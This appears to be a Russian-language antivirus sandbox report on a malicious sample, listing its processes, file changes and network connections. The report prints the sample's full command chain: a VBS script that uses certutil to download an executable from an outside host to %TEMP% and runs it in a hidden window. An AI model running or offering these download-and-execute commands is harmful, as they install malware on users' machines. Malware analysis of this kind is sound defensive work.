Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c echo CreateObject("WScript.Shell").Run "cmd.exe /c certutil.exe -urlcache -split -f " + "https://justclickam.com/dxll/ORDER%20075098.exe" + " " + "%temp%\bin.exe", 0, True > %temp%\script.v...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\script.vbs
Удаляет следующие файлы
- %TEMP%\script.vbs
Сетевая активность
Подключается к
- 'ju###lickam.com':443
TCP
Другие
- 'ju###lickam.com':443
UDP
- DNS ASK ju###lickam.com
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\wscript.exe' "%TEMP%\script.vbs"
- '<SYSTEM32>\cmd.exe' /c echo CreateObject("WScript.Shell").Run "cmd.exe /c certutil.exe -urlcache -split -f " + "https://justclickam.com/dxll/ORDER%20075098.exe" + " " + "%temp%\bin.exe", 0, True > %temp%\script.v...' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c certutil.exe -urlcache -split -f https://justclickam.com/dxll/ORDER%20075098.exe %TEMP%\bin.exe' (со скрытым окном)
- '<SYSTEM32>\cmd.exe' /c %TEMP%\bin.exe' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\timeout.exe' 3
- '<SYSTEM32>\cmd.exe' /c certutil.exe -urlcache -split -f https://justclickam.com/dxll/ORDER%20075098.exe %TEMP%\bin.exe
- '<SYSTEM32>\certutil.exe' -urlcache -split -f https://justclickam.com/dxll/ORDER%20075098.exe %TEMP%\bin.exe
- '<SYSTEM32>\cmd.exe' /c %TEMP%\bin.exe
